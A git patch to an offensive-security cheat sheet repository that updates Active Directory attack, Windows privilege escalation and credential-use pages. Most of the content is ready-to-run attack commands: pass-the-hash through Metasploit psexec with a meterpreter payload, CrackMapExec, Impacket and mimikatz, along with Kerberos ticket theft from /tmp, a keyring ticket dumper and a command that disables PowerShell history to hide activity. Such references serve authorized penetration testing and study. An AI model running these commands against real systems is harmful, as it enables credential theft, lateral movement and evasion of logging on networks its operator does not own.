From 44735975a5e5e05a1554cca232c3c841c5276fca Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 12 Jul 2021 20:45:16 +0200 Subject: [PATCH] Active Directory update --- .../Active Directory Attack.md | 76 +++++++++++-------- .../Windows - Privilege Escalation.md | 2 + .../Windows - Using credentials.md | 1 + 3 files changed, 47 insertions(+), 32 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 913822a..10b7cf4 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -1506,35 +1506,31 @@ Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso. The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500. -```powershell -use exploit/windows/smb/psexec -set RHOST 10.2.0.3 -set SMBUser jarrieta -set SMBPass nastyCutt3r -# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack. -# NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee) -set PAYLOAD windows/meterpreter/bind_tcp -run -shell -``` - -or with crackmapexec - -```powershell -cme smb 10.2.0.2 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" -also works with net range : cme smb 10.2.0.2/24 ... -``` - -or with psexec - -```powershell -proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d -``` - -or with the builtin Windows RDP and mimikatz -```powershell -sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin" -``` +* Metasploit + ```powershell + use exploit/windows/smb/psexec + set RHOST 10.2.0.3 + set SMBUser jarrieta + set SMBPass nastyCutt3r + # NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack. + # NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee) + set PAYLOAD windows/meterpreter/bind_tcp + run + shell + ``` +* CrackMapExec + ```powershell + cme smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" + ``` +* Impacket suite + ```powershell + proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d + ``` +* Windows RDP and mimikatz + ```powershell + sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863 + sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin" + ``` You can extract the local **SAM database** to find the local administrator hash : @@ -2625,15 +2621,30 @@ Navigate to any web application that is integrated with our AAD domain. Once at ### CCACHE ticket reuse from /tmp -List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be reused by setting the environment variable with `export KRB5CCNAME=/tmp/ticket.ccache` - > When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions +List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be reused by setting the environment variable with `export KRB5CCNAME=/tmp/ticket.ccache`. Kerberos ticket name format is `krb5cc_%{uid}` where uid is the user UID. + +```powershell +$ ls /tmp/ | grep krb5cc +krb5cc_1000 +krb5cc_1569901113 +krb5cc_1569901115 + +$ export KRB5CCNAME=/tmp/krb5cc_1569901115 +``` + + ### CCACHE ticket reuse from keyring Tool to extract Kerberos tickets from Linux kernel keys : https://github.com/TarlogicSecurity/tickey ```powershell +# Configuration and build +git clone https://github.com/TarlogicSecurity/tickey +cd tickey/tickey +make CONF=Release + [root@Lab-LSV01 /]# /tmp/tickey -i [*] krb5 ccache_name = KEYRING:session:sess_%{uid} [+] root detected, so... DUMP ALL THE TICKETS!! @@ -2794,4 +2805,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html) * [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/) * [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab#Previous%20Work) -* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) \ No newline at end of file +* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) +* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 0c16534..bde930e 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -541,6 +541,8 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss ### Powershell History +Disable Powershell history: `Set-PSReadlineOption -HistorySaveStyle SaveNothing`. + ```powershell type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 4c6e96a..346c8f4 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -292,6 +292,7 @@ Abuse RDP protocol to execute commands remotely with the following commands; # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group. # pass the hash works for Server 2012 R2 / Win 8.1+ + # require freerdp2-x11 freerdp2-shadow-x11 packages instead of freerdp-x11 root@payload$ xfreerdp /v:10.0.0.1 /u:username /d:domain /pth:88a405e17c0aa5debbc9b5679753939d ``` * [SharpRDP](https://github.com/0xthirteen/SharpRDP)